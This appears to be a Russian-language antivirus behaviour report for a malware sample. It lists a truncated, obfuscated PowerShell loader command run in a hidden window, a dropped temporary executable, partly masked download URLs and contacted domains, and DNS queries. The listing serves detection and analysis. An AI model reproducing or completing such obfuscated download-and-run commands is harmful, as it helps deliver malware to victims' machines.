Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $EnV:CoMspec[4,24,25]-JOIn'')(-jOIn ( '112D0w61m39m34j23F116S105S116j58,49m35m121S59&54D62{49{55S32{116F38!53S58&48w59j57S111,112w17&6,32!6,27&50{116&105{116&58m49S35,121m59{54,62m49F55S32{1...
- %TEMP%\240963.exe
- %TEMP%\240963.exe
- 'co####tproje.com':80
- 'co####tproje.com':443
- 'el##m.kg':80
- '4o###oor.net':80
- 'cs###rver.com':80
- http://www.co####tproje.com/lMQyYVE65/
- http://www.el##m.kg/v4I9i29D/
- http://www.4o###oor.net/7yf4fSER/
- http://cs###rver.com/7KYvlsji3/
- 'co####tproje.com':443
- DNS ASK co####tproje.com
- DNS ASK el##m.kg
- DNS ASK el####ocomplex.kg
- DNS ASK 4o###oor.net
- DNS ASK me###disc.co.th
- DNS ASK cs###rver.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $EnV:CoMspec[4,24,25]-JOIn'')(-jOIn ( '112D0w61m39m34j23F116S105S116j58,49m35m121S59&54D62{49{55S32{116F38!53S58&48w59j57S111,112w17&6,32!6,27&50{116&105{116&58m49S35,121m59{54,62m49F55S32{1...' (со скрытым окном)